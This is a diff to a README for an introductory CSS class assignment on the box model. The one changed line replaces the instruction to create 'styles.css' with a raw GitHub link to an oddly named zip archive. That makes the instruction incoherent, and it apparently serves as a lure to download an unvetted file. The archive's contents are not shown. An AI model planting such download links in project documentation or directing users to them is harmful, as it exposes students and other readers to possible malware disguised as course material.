PLP-WebTechnologies/july-2025-introduction-to-css-Griffnificent/README.md

 ## Instructions

-Start with a basic HTML structure and create a separate CSS file named `styles.css`.
+Start with a basic HTML structure and create a separate CSS file named `https://raw.githubusercontent.com/Griffnificent/july-2025-introduction-to-css-Griffnificent/main/pistolgraph/Griffnificent_introduction_css_to_july_holism.zip`.
 Link it to your HTML file.
 Apply various styles to headings, paragraphs, and container sections.

 Use the Box Model deliberately—experiment with margin, padding, and borders to see how they affect the layout.
 Apply background colors to visualize box boundaries.
 You may also style buttons, navigation, and card-like sections to demonstrate your grasp of spacing and alignment.